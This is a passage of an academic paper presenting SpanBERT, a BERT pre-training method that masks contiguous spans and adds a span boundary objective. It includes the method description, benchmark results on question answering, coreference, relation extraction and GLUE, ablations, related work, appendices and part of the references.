in- volve reasoning about relationships between two or more spans of text. For example, in extractive question answering (Rajpurkar et al., 2016), de- ∗Equal contribution. 1Our code and pre-trained models are available at https:// github.com/facebookresearch/SpanBERT. termining that the ‘‘Denver Broncos’’ is a type of ‘‘NFL team’’ is critical for answering the ques- tion ‘‘Which NFL team won Super Bowl 50?’’ Such spans provide a more challenging target for self supervision tasks, for example, predicting ‘‘Denver Broncos’’ is much harder than predicting only ‘‘Denver’’ when you know the next word is ‘‘Broncos’’. In this paper, we introduce a span- level pretraining approach that consistently out- performs BERT, with the largest gains on span selection tasks such as question answering and coreference resolution. We present SpanBERT, a pre-training method that is designed to better represent and predict spans of text. Our method differs from BERT in both the masking scheme and the training objec- tives. First, we mask random contiguous spans, rather than random individual tokens. Second, we introduce a novel span-boundary objective (SBO) so the model learns to predict the entire masked span from the observed tokens at its boundary. Span-based masking forces the model to predict entire spans solely using the context in which they appear. Furthermore, the SBO encourages the model to store this span-level information at the boundary tokens, which can be easily accessed during the fine-tuning stage. Figure 1 illustrates our approach. To implement SpanBERT, we build on a well- tuned replica of BERT, which itself substantially outperforms the original BERT. While building on our baseline, we find that pre-training on single segments, instead of two half-length segments with the next sentence prediction (NSP) objective, 64 Transactions of the Association for Computational Linguistics, vol. 8, pp. 64–77, 2020. https://doi.org/10.1162/tacl a 00300 Action Editor: Radu Florian. Submission batch: 9/2019; Revision batch: 10/2019; Published 3/2020. c© 2020 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 https://github.com/facebookresearch/SpanBERT https://github.com/facebookresearch/SpanBERT https://doi.org/10.1162/tacl_a_00300 Figure 1: An illustration of SpanBERT training. The span an American football game is masked. The SBO uses the output representations of the boundary tokens, x4 and x9 (in blue), to predict each token in the masked span. The equation shows the MLM and SBO loss terms for predicting the token, football (in pink), which as marked by the position embedding p3, is the third token from x4. considerably improves performance on most downstream tasks. Therefore, we add our modifi- cations on top of the tuned single-sequence BERT baseline. Together, our pre-training process yields mod- els that outperform all BERT baselines on a wide variety of tasks, and reach substantially better performance on span selection tasks in par- ticular. Specifically, our method reaches 94.6% and 88.7% F1 on SQuAD 1.1 and 2.0 (Rajpurkar et al., 2016, 2018), respectively—reducing error by as much as 27% compared with our tuned BERT replica. We also observe similar gains on five additional extractive question answering benchmarks (NewsQA, TriviaQA, SearchQA, HotpotQA, and Natural Questions).2 SpanBERT also arrives at a new state of the art on the challenging CoNLL-2012 (‘‘OntoNotes’’) shared task for document-level coreference resolu- tion, where we reach 79.6% F1, exceeding the pre- vious top model by 6.6% absolute. Finally, we demonstrate that SpanBERT also helps on tasks that do not explicitly involve span selec- tion, and show that our approach even im- proves performance on TACRED (Zhang et al., 2017) and GLUE (Wang et al., 2019). Whereas others show the benefits of adding more data (Yang et al., 2019) and increasing model size (Lample and Conneau, 2019), this work demonstrates the importance of designing 2We use the modified MRQA version of these datasets. See more details in Section 4.1. good pre-training tasks and objectives, which can also have a remarkable impact. 2 Background: BERT BERT (Devlin et al., 2019) is a self-supervised approach for pre-training a deep transformer en- coder (Vaswani et al., 2017), before fine-tuning it for a particular downstream task. BERT opti- mizes two training objectives—masked language model (MLM) and next sentence prediction (NSP)— which only require a large collection of unlabeled text. Notation Given a sequence of word or sub- word tokens X = (x1, x2, . . . , xn), BERT trains an encoder that produces a contextualized vector representation for each token: enc(x1, x2, . . . , xn) = x1, x2, . . . , xn. Masked Language Model Also known as a cloze test, MLM is the task of predicting missing tokens in a sequence from their placeholders. Specifically, a subset of tokens Y ⊆ X is sampled and substituted with a different set of tokens. In BERT’s implementation, Y accounts for 15% of the tokens in X; of those, 80% are replaced with [MASK], 10% are replaced with a random token (according to the unigram distribution), and 10% are kept unchanged. The task is to predict the original tokens in Y from the modified input. BERT selects each token in Y independently by randomly selecting a subset. In SpanBERT, we define Y by randomly selecting contiguous spans (Section 3.1). 65 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 Next Sentence Prediction The NSP task takes two sequences (XA, XB) as input, and predicts whether XB is the direct continuation of XA. This is implemented in BERT by first reading XA from the corpus, and then (1) either reading XB from the point where XA ended, or (2) randomly sampling XB from a different point in the corpus. The two sequences are separated by a special [SEP] token. Additionally, a special [CLS] token is added to XA, XB to form the input, where the target of [CLS] is whether XB indeed follows XA in the corpus. In summary, BERT optimizes the MLM and the NSP objectives by masking word pieces uniformly at random in data generated by the bi-sequence sampling procedure. In the next section, we will present our modifications to the data pipeline, masking, and pre-training objectives. 3 Model We present SpanBERT, a self-supervised pre- training method designed to better represent and predict spans of text. Our approach is inspired by BERT (Devlin et al., 2019), but deviates from its bi-text classification framework in three ways. First, we use a different random process to mask spans of tokens, rather than individual ones. We also introduce a novel auxiliary objective—the SBO—which tries to predict the entire masked span using only the representations of the tokens at the span’s boundary. Finally, SpanBERT samples a single contiguous segment of text for each train- ing example (instead of two), and thus does not use BERT’s next sentence prediction objective, which we omit. 3.1 Span Masking Given a sequence of tokens X = (x1, x2, . . . , xn), we select a subset of tokens Y ⊆ X by iteratively sampling spans of text until the masking budget (e.g., 15% of X) has been spent. At each iteration, we first sample a span length (number of words) from a geometric distribution � ∼ Geo(p), which is skewed towards shorter spans. We then ran- domly (uniformly) select the starting point for the span to be masked. We always sample a sequence of complete words (instead of subword tokens) and the starting point must be the beginning of one word. Following preliminary trials,3 we set 3We experimented with p = {0.1,0.2, 0.4} and found 0.2 to perform the best. Figure 2: We sample random span lengths from a geometric distribution � ∼ Geo(p = 0.2) clipped at �max = 10. p = 0.2, and also clip � at �max = 10. This yields a mean span length of mean (�) = 3.8. Figure 2 shows the distribution of span mask lengths. As in BERT, we also mask 15% of the tokens in total: replacing 80% of the masked tokens with [MASK], 10% with random tokens, and 10% with the original tokens. However, we perform this replacement at the span level and not for each token individually; that is, all the tokens in a span are replaced with [MASK] or sampled tokens. 3.2 Span Boundary Objective Span selection models (Lee et al., 2016, 2017; He et al., 2018) typically create a fixed-length representation of a span using its boundary tokens (start and end). To support such models, we would ideally like the representations for the end of the span to summarize as much of the internal span content as possible. We do so by introducing a span boundary objective that involves predicting each token of a masked span using only the representations of the observed tokens at the boundaries (Figure 1). Formally, we denote the output of the trans- former encoder for each token in the sequence by x1, . . . , xn. Given a masked span of tokens (xs, . . . , xe) ∈ Y , where (s, e) indicates its start and end positions, we represent each token xi in the span using the output encodings of the external boundary tokens xs−1 and xe+1, as well as the position embedding of the target token pi−s+1: yi = f(xs−1, xe+1, pi−s+1) 66 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 where position embeddings p1, p2, . . . mark rela- tive positions of the masked tokens with respect to the left boundary token xs−1. We implement the representation function f(·) as a 2-layer feed-forward network with GeLU activations (Hendrycks and Gimpel, 2016) and layer normal- ization (Ba et al., 2016): h0 = [xs−1; xe+1; pi−s+1] h1 = LayerNorm (GeLU(W1h0)) yi = LayerNorm (GeLU(W2h1)) We then use the vector representation yi to predict the token xi and compute the cross-entropy loss exactly like the MLM objective. SpanBERT sums the loss from both the span boundary and the regular masked language model objectives for each token xi in the masked span (xs, . . . , xe), while reusing the input embedding (Press and Wolf, 2017) for the target tokens in both MLM and SBO: L(xi) = LMLM(xi) + LSBO(xi) = − log P (xi | xi) − log P (xi | yi) 3.3 Single-Sequence Training As described in Section 2, BERT’s examples con- tain two sequences of text (XA, XB), and an objective that trains the model to predict whether they are connected (NSP). We find that this set- ting is almost always worse than simply using a single sequence without the NSP objective (see Section 5 for further details). We conjecture that single-sequence training is superior to bi-sequence training with NSP because (a) the model benefits from longer full-length contexts, or (b) condi- tioning on, often unrelated, context from an- other document adds noise to the masked language model. Therefore, in our approach, we remove both the NSP objective and the two-segment sam- pling procedure, and simply sample a single con- tiguous segment of up to n = 512 tokens, rather than two half-segments that sum up to n tokens together. In summary, SpanBERT pre-trains span repre- sentations by: (1) masking spans of full words using a geometric distribution based masking scheme (Section 3.1), (2) optimizing an auxiliary span-boundary objective (Section 3.2) in addition to MLM using a single-sequence data pipeline (Section 3.3). A procedural description can be found in Appendix A. 4 Experimental Setup 4.1 Tasks We evaluate on a comprehensive suite of tasks, including seven question answering tasks, coref- erence resolution, nine tasks in the GLUE bench- mark (Wang et al., 2019), and relation extraction. We expect that the span selection tasks, question answering and coreference resolution, will partic- ularly benefit from our span-based pre-training. Extractive Question Answering Given a short passage of text and a question as input, the task of extractive question answering is to select a contiguous span of text in the passage as the answer. We first evaluate on SQuAD 1.1 and 2.0 (Rajpurkar et al., 2016, 2018), which have served as major question answering benchmarks, particularly for pre-trained models (Peters et al., 2018; Devlin et al., 2019; Yang et al., 2019). We also evaluate on five more datasets from the MRQA shared task (Fisch et al., 2019)4: NewsQA (Trischler et al., 2017), SearchQA (Dunn et al., 2017), TriviaQA (Joshi et al., 2017), HotpotQA (Yang et al., 2018), and Natural Questions (Kwiatkowski et al., 2019). Because the MRQA shared task does not have a public test set, we split the development set in half to make new development and test sets. The datasets vary in both domain and collection meth- odology, making this collection a good test bed for evaluating whether our pre-trained models can generalize well across different data distributions. Following BERT (Devlin et al., 2019), we use the same QA model architecture for all the data- sets. We first convert the passage P = (p1, p2, . . . , pl) and question Q = (q1, q2, . . . , ql′) into a single sequence X = [CLS]p1p2 . . . pl[SEP] q1q2 . . . ql′[SEP], pass it to the pre-trained trans- former encoder, and train two linear classifiers independently on top of it for predicting the answer span boundary (start and end). For the unanswer- able questions in SQuAD 2.0, we simply set the 4https://github.com/mrqa/MRQA-Shared- Task-2019. MRQA changed the original datasets to unify them into the same format, e.g., all the contexts are truncated to a maximum of 800 tokens and only answerable questions are kept. 67 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 https://github.com/mrqa/MRQA-Shared-Task-2019 https://github.com/mrqa/MRQA-Shared-Task-2019 answer span to be the special token [CLS] for both training and testing. Coreference Resolution Coreference resolu- tion is the task of clustering mentions in text which refer to the same real-world entities. We evaluate on the CoNLL-2012 shared task (Pradhan et al., 2012) for document-level coreference resolu- tion. We use the independent version of the Joshi et al. (2019b) implementation of the higher-order coreference model (Lee et al., 2018). The docu- ment is divided into non-overlapping segments of a pre-defined length.5 Each segment is encoded independently by the pre-trained transformer encoder, which replaces the original LSTM-based encoder. For each mention span x, the model learns a distribution P(·) over possible antecedent spans Y : P(y) = es(x,y) ∑ y′∈Y e s(x,y′) The span pair scoring function s(x, y) is a feed- forward neural network over fixed-length span representations and hand-engineered features over x and y: s(x, y) = sm(x) + sm(y) + sc(x, y) sm(x) = FFNN m(gx) sc(x, y) = FFNN c(gx, gy, φ(x, y)) Here gx and gy denote the span representations, which are a concatenation of the two transformer output states of the span endpoints and an attention vector computed over the output representations of the token in the span. FFNNm and FFNNc represent two feedforward neural networks with one hidden layer, and φ(x, y) represents the hand- engineered features (e.g., speaker and genre infor- mation). A more detailed description of the model can be found in Joshi et al. (2019b). Relation Extraction TACRED (Zhang et al., 2017) is a challenging relation extraction dataset. Given one sentence and two spans within it— subject and object—the task is to predict the relation between the spans from 42 pre-defined relation types, including no relation. We follow the entity masking schema from Zhang et al. (2017) and replace the subject and object entities by their NER tags such as ‘‘[CLS][SUBJ-PER] 5The length was chosen from {128, 256, 384, 512}. See more details in Appendix B. was born in [OBJ-LOC] , Michigan, . . . ’’, and finally add a linear classifier on top of the [CLS] token to predict the relation type. GLUE The General Language Understanding Evaluation (GLUE) benchmark (Wang et al., 2019) consists of 9 sentence-level classification tasks: • Two sentence-level classification tasks in- cluding CoLA (Warstadt et al., 2018) for evaluating linguistic acceptability and SST-2 (Socher et al., 2013) for sentiment classification. • Three sentence-pair similarity tasks includ- ing MRPC (Dolan and Brockett, 2005), a binary paraphrasing task sentence pairs from news sources, STS-B (Cer et al., 2017), a graded similarity task for news headlines, and QQP,6 a binary paraphrasing tasking be- tween Quora question pairs. • Four natural language inference tasks in- cluding MNLI (Williams et al., 2018), QNLI (Rajpurkar et al., 2016), RTE (Dagan et al., 2005; Bar-Haim et al., 2006; Giampiccolo et al., 2007), and WNLI (Levesque et al., 2011). Unlike question answering, coreference resolu- tion, and relation extraction, these sentence-level tasks do not require explicit modeling of span- level semantics. However, they might still benefit from implicit span-based reasoning (e.g., the Prime Minister is the head of the government). Following previous work (Devlin et al., 2019; Radford et al., 2018),7 we exclude WNLI from the results to enable a fair comparison. Although recent work Liu et al. (2019a) has applied several task-specific strategies to increase performance on the individual GLUE tasks, we follow BERT’s single-task setting and only add a linear classi- fier on top of the [CLS] token for these classifi- cation tasks. 4.2 Implementation We reimplemented BERT’s model and pre- training method in fairseq (Ott et al., 2019). 6https://data.quora.com/First-Quora- Dataset-Release-Question-Pairs. 7Previous work has excluded WNLI on account of con- struction issues outlined on the GLUE website – https:// gluebenchmark.com/faq. 68 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 https://data.quora.com/First-Quora-Dataset-Release-Question-Pairs https://data.quora.com/First-Quora-Dataset-Release-Question-Pairs https://gluebenchmark.com/faq https://gluebenchmark.com/faq We used the model configuration of BERTlarge as in Devlin et al. (2019) and also pre-trained all our models on the same corpus: BooksCorpus and English Wikipedia using cased Wordpiece tokens. Compared with the original BERT implemen- tation, the main differences in our implementation include: (a) We use different masks at each epoch while BERT samples 10 different masks for each sequence during data processing. (b) We remove all the short-sequence strategies used before (they sampled shorter sequences with a small proba- bility 0.1; they also first pre-trained with smaller sequence length of 128 for 90% of the steps). Instead, we always take sequences of up to 512 tokens until it reaches a document boundary. We refer readers to Liu et al. (2019b) for further dis- cussion on these modifications and their effects. As in BERT, the learning rate is warmed up over the first 10,000 steps to a peak value of 1e-4, and then linearly decayed. We retain β hyper- parameters (β1 = 0.9, β2 = 0.999) and a de- coupled weight decay (Loshchilov and Hutter, 2019) of 0.1. We also keep a dropout of 0.1 on all layers and attention weights, and a GeLU ac- tivation function (Hendrycks and Gimpel, 2016). We deviate from the optimization by running for 2.4M steps and using an epsilon of 1e-8 for AdamW (Kingma and Ba, 2015), which con- verges to a better set of model parameters. Our im- plementation uses a batch size of 256 sequences with a maximum of 512 tokens.8 For the SBO, we use 200 dimension position embeddings p1, p2, . . . to mark positions relative to the left boundary token. The pre-training was done on 32 Volta V100 GPUs and took 15 days to complete. Fine-tuning is implemented based on Hugging- Face’s codebase (Wolf et al., 2019) and more details are given in Appendix B. 4.3 Baselines We compare SpanBERT to three baselines: Google BERT The pre-trained models released by Devlin et al. (2019).9 Our BERT Our reimplementation of BERT with improved data preprocessing and optimiza- tion (Section 4.2). 8On the average, this is approximately 390 sequences, because some documents have fewer than 512 tokens. 9https://github.com/google-research/bert. SQuAD 1.1 SQuAD 2.0 EM F1 EM F1 Human Perf. 82.3 91.2 86.8 89.4 Google BERT 84.3 91.3 80.0 83.3 Our BERT 86.5 92.6 82.8 85.9 Our BERT-1seq 87.5 93.3 83.8 86.6 SpanBERT 88.8 94.6 85.7 88.7 Table 1: Test results on SQuAD 1.1 and SQuAD 2.0. Our BERT-1seq Our reimplementation of BERT trained on single full-length sequences without NSP (Section 3.3). 5 Results We compare SpanBERT to the baselines per task, and draw conclusions based on the overall trends. 5.1 Per-Task Results Extractive Question Answering Table 1 shows the performance on both SQuAD 1.1 and 2.0. SpanBERT exceeds our BERT baseline by 2.0% and 2.8% F1, respectively (3.3% and 5.4% over Google BERT). In SQuAD 1.1, this result ac- counts for over 27% error reduction, reaching 3.4% F1 above human performance. Table 2 demonstrates that this trend goes be- yond SQuAD, and is consistent in every MRQA dataset. On average, we see a 2.9% F1 improve- ment from our reimplementation of BERT. Al- though some gains are coming from single-sequence training (+1.1%), most of the improvement stems from span masking and the span boundary objec- tive (+1.8%), with particularly large gains on TriviaQA (+3.2%) and HotpotQA (+2.7%). Coreference Resolution Table 3 shows the performance on the OntoNotes coreference res- olution benchmark. Our BERT reimplementation improves the Google BERT model by 1.2% on the average F1 metric and single-sequence train- ing brings another 0.5% gain. Finally, SpanBERT improves considerably on top of that, achieving a new state of the art of 79.6% F1 (previous best result is 73.0%). Relation Extraction Table 4 shows the perfor- mance on TACRED. SpanBERT exceeds our reimplementation of BERT by 3.3% F1 and achieves close to the current state of the art (Soares et al., 2019)—Our model performs better than 69 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 https://github.com/google-research/bert NewsQA TriviaQA SearchQA HotpotQA Natural Questions Avg. Google BERT 68.8 77.5 81.7 78.3 79.9 77.3 Our BERT 71.0 79.0 81.8 80.5 80.5 78.6 Our BERT-1seq 71.9 80.4 84.0 80.3 81.8 79.7 SpanBERT 73.6 83.6 84.8 83.0 82.5 81.5 Table 2: Performance (F1) on the five MRQA extractive question answering tasks. MUC B3 CEAFφ4 P R F1 P R F1 P R F1 Avg. F1 Prev. SotA: (Lee et al., 2018) 81.4 79.5 80.4 72.2 69.5 70.8 68.2 67.1 67.6 73.0 Google BERT 84.9 82.5 83.7 76.7 74.2 75.4 74.6 70.1 72.3 77.1 Our BERT 85.1 83.5 84.3 77.3 75.5 76.4 75.0 71.9 73.9 78.3 Our BERT-1seq 85.5 84.1 84.8 77.8 76.7 77.2 75.3 73.5 74.4 78.8 SpanBERT 85.8 84.8 85.3 78.3 77.9 78.1 76.4 74.2 75.3 79.6 Table 3: Performance on the OntoNotes coreference resolution benchmark. The main evaluation is the average F1 of three metrics: MUC, B3, and CEAFφ4 on the test set. p R F1 BERTEM(Soares et al., 2019) − − 70.1 BERTEM+MTB∗ − − 71.5 Google BERT 69.1 63.9 66.4 Our BERT 67.8 67.2 67.5 Our BERT-1seq 72.4 67.9 70.1 SpanBERT 70.8 70.9 70.8 Table 4: Test performance on the TACRED relation extraction benchmark. BERTlarge and BERTEM+MTB from Soares et al. (2019) are the current state-of-the-art. ∗: BERTEM+MTB incor- porated an intermediate ‘‘matching the blanks’’ pre-training on the entity-linked text based on English Wikipedia, which is not a direct compar- ison to ours trained only from raw text. their BERTEM but is 0.7 point behind BERTEM + MTB, which used entity-linked text for additional pre-training. Most of this gain (+2.6%) stems from single-sequence training although the contribution of span masking and the span boundary objective is still a considerable 0.7%, resulting largely from higher recall. GLUE Table 5 shows the performance on GLUE. For most tasks, the different models appear to perform similarly. Moving to single-sequence training without the NSP objective substantially improves CoLA, and yields smaller (but consid- erable) improvements on MRPC and MNLI. The main gains from SpanBERT are in the SQuAD- based QNLI dataset (+1.3%) and in RTE (+6.9%), the latter accounting for most of the rise in SpanBERT’s GLUE average. 5.2 Overall Trends We compared our approach to three BERT base- lines on 17 benchmarks, and found that SpanBERT outperforms BERT on almost every task. In 14 tasks, SpanBERT performed better than all base- lines. In two tasks (MRPC and QQP), it performed on-par in terms of accuracy with single-sequence trained BERT, but still outperformed the other baselines. In one task (SST-2), Google’s BERT baseline performed better than SpanBERT by 0.4% accuracy. When considering the magnitude of the gains, it appears that SpanBERT is especially better at extractive question answering. In SQuAD 1.1, for example, we observe a solid gain of 2.0% F1 even though the baseline is already well above human performance. On MRQA, SpanBERT im- proves between 2.0% (Natural Questions) and 4.6% (TriviaQA) F1 on top of our BERT baseline. Finally, we observe that single-sequence train- ing works considerably better than bi-sequence 70 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 CoLA SST-2 MRPC STS-B QQP MNLI QNLI RTE (Avg) Google BERT 59.3 95.2 88.5/84.3 86.4/88.0 71.2/89.0 86.1/85.7 93.0 71.1 80.4 Our BERT 58.6 93.9 90.1/86.6 88.4/89.1 71.8/89.3 87.2/86.6 93.0 74.7 81.1 Our BERT-1seq 63.5 94.8 91.2/87.8 89.0/88.4 72.1/89.5 88.0/87.4 93.0 72.1 81.7 SpanBERT 64.3 94.8 90.9/87.9 89.9/89.1 71.9/89.5 88.1/87.7 94.3 79.0 82.8 Table 5: Test set performance on GLUE tasks. MRPC: F1/accuracy, STS-B: Pearson/Spearmanr correlation, QQP: F1/accuracy, MNLI: matched/mistached accuracies, and accuracy for all the other tasks. WNLI (not shown) is always set to majority class (65.1% accuracy) and included in the average. training with NSP with BERT’s choice of se- quence lengths for a wide variety of tasks. This is surprising because BERT’s ablations showed gains from the NSP objective (Devlin et al., 2019). However, the ablation studies still involved bi- sequence data processing (i.e., the pre-training stage only controlled for the NSP objective while still sampling two half-length sequences). We hy- pothesize that bi-sequence training, as it is im- plemented in BERT (see Section 2), impedes the model from learning longer-range features, and consequently hurts performance on many down- stream tasks. 6 Ablation Studies We compare our random span masking scheme with linguistically-informed masking schemes, and find that masking random spans is a com- petitive and often better approach. We then study the impact of the SBO, and contrast it with BERT’s NSP objective.10 6.1 Masking Schemes Previous work (Sun et al., 2019) has shown im- provements in downstream task performance by masking linguistically informed spans during pre- training for Chinese data. We compare our ran- dom span masking scheme with masking of linguistically informed spans. Specifically, we train the following five baseline models differing only in the way tokens are masked. Subword Tokens We sample random Word- piece tokens, as in the original BERT. Whole Words We sample random words, and then mask all of the subword tokens in those words. The total number of masked subtokens is around 15%. 10To save time and resources, we use the checkpoints at 1.2M steps for all the ablation experiments. Named Entities At 50% of the time, we sample from named entities in the text, and sample random whole words for the other 50%. The total number of masked subtokens is 15%. Specifically, we run spaCy’s named entity recognizer (Honnibal and Montani, 2017)11 on the corpus and select all the non-numerical named entity mentions as candidates. Noun Phrases Similar to Named Entities, we sample from noun phrases at 50% of the time. The noun phrases are extracted by running spaCy’s constituency parser. Geometric Spans We sample random spans from a geometric distribution, as in our SpanBERT (see Section 3.1). Table 6 shows how different pre-training masking schemes affect performance on the devel- opment set of a selection of tasks. All the mod- els are evaluated on the development sets and are based on the default BERT setup of bi-sequence training with NSP; the results are not directly com- parable to the main evaluation. With the exception of coreference resolution, masking random spans is preferable to other strategies. Although linguis- tic masking schemes (named entities and noun phrases) are often competitive with random spans, their performance is not consistent; for instance, masking noun phrases achieves parity with ran- dom spans on NewsQA, but underperforms on TriviaQA (−1.1% F1). On coreference resolution, we see that masking random subword tokens is preferable to any form of span masking. Nevertheless, we shall see in the following experiment that combining random span masking with the span boundary objective can improve upon this result considerably. 6.2 Auxiliary Objectives In Section 5, we saw that bi-sequence training with the NSP objective can hurt performance on 11https://spacy.io/. 71 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 https://spacy.io/ SQuAD 2.0 NewsQA TriviaQA Coreference MNLI-m QNLI GLUE (Avg) Subword Tokens 83.8 72.0 76.3 77.7 86.7 92.5 83.2 Whole Words 84.3 72.8 77.1 76.6 86.3 92.8 82.9 Named Entities 84.8 72.7 78.7 75.6 86.0 93.1 83.2 Noun Phrases 85.0 73.0 77.7 76.7 86.5 93.2 83.5 Geometric Spans 85.4 73.0 78.8 76.4 87.0 93.3 83.4 Table 6: The effect of replacing BERT’s original masking scheme (Subword Tokens) with different masking schemes. Results are F1 scores for QA tasks and accuracy for MNLI and QNLI on the development sets. All the models are based on bi-sequence training with NSP. SQuAD 2.0 NewsQA TriviaQA Coref MNLI-m QNLI GLUE (Avg) Span Masking (2seq) + NSP 85.4 73.0 78.8 76.4 87.0 93.3 83.4 Span Masking (1seq) 86.7 73.4 80.0 76.3 87.3 93.8 83.8 Span Masking (1seq) + SBO 86.8 74.1 80.3 79.0 87.6 93.9 84.0 Table 7: The effects of different auxiliary objectives, given MLM over random spans as the primary objective. downstream tasks, when compared with single- sequence training. We test whether this holds true for models pre-trained with span masking, and also evaluate the effect of replacing the NSP objective with the SBO. Table 7 confirms that single-sequence training typically improves performance. Adding SBO fur- ther improves performance, with a substantial gain on coreference resolution (+2.7% F1) over span masking alone. Unlike the NSP objective, SBO does not appear to have any adverse effects. 7 Related Work Pre-trained contextualized word representations that can be trained from unlabeled text (Dai and Le, 2015; Melamud et al., 2016; Peters et al., 2018) have had immense impact on NLP lately, partic- ularly as methods for initializing a large model before fine-tuning it for a specific task (Howard and Ruder, 2018; Radford et al., 2018; Devlin et al., 2019). Beyond differences in model hyper- parameters and corpora, these methods mainly differ in their pre-training tasks and loss functions, with a considerable amount of contemporary liter- ature proposing augmentations of BERT’s MLM objective. While previous and concurrent work has looked at masking (Sun et al., 2019) or dropping (Song et al., 2019; Chan et al., 2019) multiple words from the input—particularly as pretraining for lan- guage generation tasks—SpanBERT pretrains span representations (Lee et al., 2016), which are widely used for question answering, coreference resolution, and a variety of other tasks. ERNIE (Sun et al., 2019) shows improvements on Chinese NLP tasks using phrase and named entity mask- ing. MASS (Song et al., 2019) focuses on language generation tasks, and adopts the encoder-decoder framework to reconstruct a sentence fragment given the remaining part of the sentence. We attempt to more explicitly model spans using the SBO objective, and show that (geometrically dis- tributed) random span masking works as well, and sometimes better than, masking linguistically- coherent spans. We evaluate on English bench- marks for question answering, relation extraction, and coreference resolution in addition to GLUE. A different ERNIE (Zhang et al., 2019) fo- cuses on integrating structured knowledge bases with contextualized representations with an eye on knowledge-driven tasks like entity typing and re- lation classification. UNILM (Dong et al., 2019) uses multiple language modeling objectives— unidirectional (both left-to-right and right-to-left), bidirectional, and sequence-to-sequence prediction— to aid generation tasks like summarization and question generation. XLM (Lample and Conneau, 2019) explores cross-lingual pre-training for multi- lingual tasks such as translation and cross-lingual classification. Kermit (Chan et al., 2019), an in- sertion based approach, fills in missing tokens 72 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 (instead of predicting masked ones) during pre- training; they show improvements on machine translation and zero-shot question answering. Concurrent with our work, RoBERTa (Liu et al., 2019b) presents a replication study of BERT pre-training that measures the impact of many key hyperparameters and training data size. Also concurrent, XLNet (Yang et al., 2019) combines an autoregressive loss and the Transformer-XL (Dai et al., 2019) architecture with a more than an eight-fold increase in data to achieve current state- of-the-art results on multiple benchmarks. XLNet also masks spans (of 1–5 tokens) during pre- training, but predicts them autoregressively. Our model focuses on incorporating span-based pre- training, and as a side effect, we present a stronger BERT baseline while controlling for the corpus, architecture, and the number of parameters. Related to our SBO objective, pair2vec (Joshi et al., 2019a) encodes word-pair relations using a negative sampling-based multivariate objective during pre-training. Later, the word-pair repre- sentations are injected into the attention-layer of downstream tasks, and thus encode limited down- stream context. Unlike pair2vec, our SBO objec- tive yields ‘‘pair’’ (start and end tokens of spans) representations which more fully encode the con- text during both pre-training and finetuning, and are thus more appropriately viewed as span repre- sentations. Stern et al. (2018) focus on improving language generation speed using a block-wise par- allel decoding scheme; they make predictions for multiple time steps in parallel and then back off to the longest prefix validated by a scoring model. Also related are sentence representation methods (Kiros et al., 2015; Logeswaran and Lee, 2018), which focus on predicting surrounding contexts from sentence embeddings. 8 Conclusion We presented a new method for span-based pre- training which extends BERT by (1) masking contiguous random spans, rather than random tokens, and (2) training the span boundary repre- sentations to predict the entire content of the masked span, without relying on the individual token representations within it. Together, our pre- training process yields models that outperform all BERT baselines on a variety of tasks, and reach substantially better performance on span selection tasks in particular. Appendices A Pre-training Procedure We describe our pre-training procedure as follows: 1. Divide the corpus into single contiguous blocks of up to 512 tokens. 2. At each step of pre-training: (a) Sample a batch of blocks uniformly at random. (b) Mask 15% of word pieces in each block in the batch using the span masking scheme (Section 3.1). (c) For each masked token xi, opti- mize L(xi) = LMLM(xi) + LSBO(xi) (Section 3.2). B Fine-tuning Hyperparameters We apply the following fine-tuning hyperparam- eters to all methods, including the baselines. Extractive Question Answering For all the question answering tasks, we use max seq length = 512 and a sliding window of size 128 if the lengths are longer than 512. We choose learning rates from {5e-6, 1e-5, 2e-5, 3e-5, 5e-5} and batch sizes from {16, 32} and fine-tune four epochs for all the datasets. Coreference Resolution We divide the docu- ments into multiple chunks of lengths up to max seq length and encode each chunk indepen- dently. We choose max seq length from {128, 256, 384, 512}, BERT learning rates from {1e-5, 2e-5}, task-specific learning rates from {1e-4, 2e-4, 3e-4}, and fine-tune 20 epochs for all the datasets. We use batch size = 1 (one document) for all the experiments. TACRED/GLUE We use max seq length = 128 and choose learning rates from {5e-6, 1e-5, 2e-5, 3e-5, 5e-5} and batch sizes from {16, 32} and fine-tuning 10 epochs for all the datasets. The only exception is CoLA, where we used four epochs (following Devlin et al., 2019), because 10 epochs lead to severe overfitting. 73 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00300 by Carnegie Mellon University user on 06 April 2021 Acknowledgments We would like to thank Pranav Rajpurkar and Robin Jia for patiently helping us evaluate SpanBERT on SQuAD. We thank the anonymous reviewers, the action editor, and our colleagues at Facebook AI Research and the University of Washington for their insightful feedback that helped improve the paper. References Jimmy Lei Ba, Jamie Ryan Kiros, and Geoffrey E. Hinton. 2016. Layer normalization. arXiv pre- print arXiv:1607.06450. Roy Bar-Haim, Ido Dagan, Bill Dolan, Lisa Ferro, Danilo Giampiccolo, Bernardo Magnini, and Idan Szpektor. 2006. The second PASCAL recognising textual entailment challenge. In Proceedings of the Second PASCAL Challenges Workshop on Recognising Textual Entailment, pages 6–4. Daniel Cer, Mona Diab, Eneko Agirre, IÃśigo Lopez-Gazpio, and Lucia Specia. 2017. Semeval-2017 task 1: Semantic textual similar- ity multilingual and crosslingual focused eval- uation. In International Workshop on Semantic Evaluation (SemEval), pages 1–14. Vancouver, Canada. William Chan, Nikita Kitaev, Kelvin Guu, Mitchell Stern, and Jakob Uszkoreit. 2019. KERMIT: Generative insertion-based modeling for sequences. arXiv preprint arXiv:1906.01604. Ido Dagan, Oren Glickman, and Bernardo Magnini. 2005. The PASCAL recognising tex- tual entailment challenge. In Machine Learning Challenges Workshop, pages 177–190. Springer. 